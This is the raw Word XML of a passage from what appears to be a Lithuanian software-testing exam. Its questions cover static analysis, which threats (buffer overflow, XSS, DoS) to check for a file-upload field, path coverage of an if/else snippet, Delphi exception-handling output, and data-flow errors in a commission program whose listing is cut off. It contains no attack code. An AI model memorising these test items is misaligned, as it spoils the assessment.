          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programinio kodo sudėtingumo analizė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Profiliavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tinklo paketų šnipinėjimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rašybos ir gramatikos tikrinimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sistema turi redaguotiną, laisvos fo</w:t>
      </w:r>
      <w:r w:rsidR="0025377E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rmos įvesties lauką, pavadintą</w:t>
      </w:r>
      <w:r w:rsidR="002D44FF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00015CB9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pasirinkite bylą, kurią norite įkelti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”. Remdamiesi tik šia informacija, kurią iš žemiau pateiktų saugumo grėsmių patikrintumėte?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00015CB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Buferio perpildymas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00015CB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00015CB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Atsisakymas aptarnauti (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00015CB9" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Šifro nulaužimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00807856" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Su prielaida, kad visos sąlygos nepriklauso </w:t>
      </w:r>
      <w:r w:rsidR="007F0ADF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">viena </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">nuo kitos, kiek reikia testavimo atvejų norint padengti visus galimus sistemos kelius (paths) žemiau pateiktame kode? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>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3650"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5387" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0  if (Condition 1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1         then statement 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2   else statement 2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3  fi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4  if (Condition 2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5        then statement 3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="38"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6  fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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807856" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Kokie skaičiai bus atvaizduoti ekrane po žemiau pateikto kodo vykdymo?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F2524" w:rsidRPr="00AD4464" w:rsidRDefault="003F2524" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-E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4"/>
        <w:gridCol w:w="3650"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0 procedure TForm.Button1Click (Sender: TObject);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1  begin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>try</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">   try</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">       StrToInt('some number');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">       ShowMessage('1');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">   except</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">       ShowMessage('2');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">   end;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">9 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>finally</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">       ShowMessage('3');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>end;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>ShowMessage('4');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>13 end;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00AE152D" w:rsidRPr="00AD4464" w:rsidRDefault="00AE152D" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005667BB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Žemiau pateiktas kodas skaičiuoja ir atspausdina ekrane komisinius už atliktus pardavimus. Ko</w:t>
      </w:r>
      <w:r w:rsidR="008270D6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ias </w:t>
      </w:r>
      <w:r w:rsidR="008270D6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">duomenų srautų </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>klaidas matote šioje programoje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216DCC" w:rsidRPr="00AD4464" w:rsidRDefault="00216DCC" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>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3650"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A040A" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5387" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0 program Calculate Commission</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1 total, number : integer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2 commission_hi, commission_lo : real</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3 begin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4     read ( number )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5     while number ≠ -1 loop</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
